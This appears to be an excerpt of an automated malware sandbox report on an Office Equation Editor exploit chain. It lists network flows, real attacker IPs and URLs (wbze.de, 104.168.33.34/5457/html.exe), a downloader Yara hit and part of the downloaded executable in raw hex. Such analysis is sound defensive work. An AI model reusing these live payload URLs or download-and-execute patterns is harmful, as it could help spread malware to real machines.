Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 109.71.253.25:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 109.71.253.25:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 109.71.253.25:80
Source: global traffic	TCP traffic: 109.71.253.25:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
Source: global traffic	TCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 8_2_0361062C LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

8_2_0361062C

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 12:59:19 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 06 May 2024 08:40:11 GMTETag: "b7e00-617c5048189d1"Accept-Ranges: bytesContent-Length: 753152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 99 e2 d5 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6a 0a 00 00 12 01 00 00 00 00 00 ae 89 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 59 89 0a 00 4f 00 00 00 00 a0 0a 00 f0 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 0c 68 0a 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 69 0a 00 00 20 00 00 00 6a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 0e 01 00 00 a0 0a 00 00 10 01 00 00 6c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0b 00 00 02 00 00 00 7c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 89 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 58 00 00 d0 46 00 00 03 00 00 00 44 00 00 06 b4 9f 00 00 58 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 69 00 00 00 01 00 00 11 02 72 01 00 00 70 7d 01 00 00 04 02 72 01 00 00 70 7d 02 00 00 04 02 28 1b 00 00 0a 00 00 02 03 7d 02 00 00 04 03 1f 3d 28 01 00 00 2b 0a 06 2c 0b 00 02 28 02 00 00 06 00 00 2b 2c 03 1f 3e 28 01 00 00 2b 0b 07 2c 0b 00 02 28 03 00 00 06 00 00 2b 15 03 1f 3c 28 01 00 00 2b 0c 08 2c 09 00 02 28 04 00 00 06 00 00 2a 00 00 00 1b 30 05 00 20 01 00 00 02 00 00 11 00 02 7b 02 00 00 04 17 8d 4f 00 00 01 25 16 1f 3d 9d 6f 1d 00 00 0a 0a 06 16 9a 6f 1e 00 00 0a 0b 07 1f 20 28 01 00 00 2b 0c 08 39 e2 00 00 00 00 07 17 8d 4f 00 00 01 25 16 1f 20 9d 6f 1d 00 00 0a 0d 09 17 9a 6f 1e 00 00 0a 13 04 06 17 9a 17 8d 4f 00 00 01 25 16 1f 0a 9d 6f 1d 00 00 0a 13 05 00 11 05 16 9a 28 1f 00 00 0a 13 06 7e 04 00 00 04 11 04 6f 20 00 00 0a 13 07 11 07 2c 6e 00 7e 04 00 00 04 11 04 6f 21 00 00 0a 13 08 7e 05 00 00 04 11 08 6f 22 00 00 0a a5 51 00 00 01 13 09 11 06

Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

Source: C:\Users\user\AppData\Roaming\html.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\html.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\html.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\html.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\html.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\html.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	DNS query: name: api.ipify.org

Source: global traffic	HTTP traffic detected: GET /u7xc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: wbze.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /u7xc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: wbze.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 104.168.33.34Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /5457/html.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.33.34Connection: Keep-Alive

Source: unknown	HTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49166 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
